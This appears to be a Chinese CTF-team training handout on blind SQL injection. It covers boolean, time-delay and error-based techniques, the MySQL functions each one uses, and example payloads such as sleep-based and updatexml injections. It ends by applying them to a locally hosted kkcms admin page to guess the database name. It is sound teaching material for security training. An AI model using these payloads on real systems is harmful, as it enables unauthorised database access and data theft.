河南省高校联盟战队课件5(SQL-增删改查&盲注&延时&布尔&报错)

									增删改查&盲注&延时&布尔&报错(5)

个人介绍

id：故事 普通的web喵

详细视频

增删改查&盲注&延时&布尔&报错

一、#知识点：

明确查询方式注入Payload明确查询方式注入产生功能明确SQL盲注延时&布尔&报错

（1）如下我们将显示的函数关闭看不到回显的情况就可以使用盲注

二、#详细点：

（1）盲注是什么：盲注就是在注入过程中，获取的数据不能回显至前端页面。

此时，我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。

（2）盲注解决的问题：常规的联合查询注入不行的情况

（3）我们可以知道盲注分为以下三类：

基于布尔的SQL盲注-逻辑判断

regexp,like,ascii,left,ord,mid

基于时间的SQL盲注-延时判断

if,sleep

基于报错的SQL盲注-报错回显(有报错函数)

floor，updatexml，extractvalue

三、参考：

like 'ro%'            #判断ro或ro...是否成立 

regexp '^gushi[a-z]' #匹配gushi及gushi...等

if(条件,5,0)           #条件成立 返回5 反之 返回0

sleep(5)              #SQL语句延时执行5秒

mid(a,b,c)            #从位置b开始，截取a字符串的c位

substr(a,b,c)         #从位置b开始，截取字符串a的c长度

left(database(),1)，database() #left(a,b)从左侧截取a的前b位

length(database())=8  #判断数据库database()名的长度

ord=ascii ascii(x)=97 #判断x的ascii码是否等于97

四、SQL查询方式注入(增删改查)

select,insert,update,delete,orderby等

五、基本语句&基本知识

select * from member where id=1 and sleep(1);
select * from member where id=1 and if(1<2,sleep(1),0);
select * from member where id=1 and length(database())=7;
select * from member where id=1 and left(database(),1)='p';
select * from member where id=1 and left(database(),2)='pi';
select * from member where id=1 and substr(database(),1,1)='p';
select * from member where id=1 and ord(left(database(),1))=112;

五、SQL-盲注&布尔&报错&延时（news.php）

PHP开发项目-输出结果&开启报错

基于延时：都不需要

?id=1 and if(1=1,sleep(5),0)

基于布尔：有数据库输出判断标准

?id=1 and length(database())=7

基于报错：有数据库报错处理判断标准

?id=2 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

六、本地搭建的实际案例：kkcms(kkcms/admin/cms_usergroup.php?)
正常访问时间：

kkcms/admin/cms_usergroup.php?del=5

让他延迟：

?del=5%20or%20if(1=1,sleep(5),0)

猜数据库：

?del=5%20or%20if(ord(left(database(),1))=108,sleep(5),0)

?del=5%20or%20if(ord(left(database(),1))=107,sleep(5),0)

以此类推

知识点：

1、查询方式增删改查四种特性决定，部分是不需要进行数据取出和显示，所以此类注入基本上需要采用盲注才能正常得到结果（黑盒测试可以根据功能判断注入查询方式）

2、查询方式增删改查四种特性决定应用功能点（会员注册，删除新闻，修改文章等）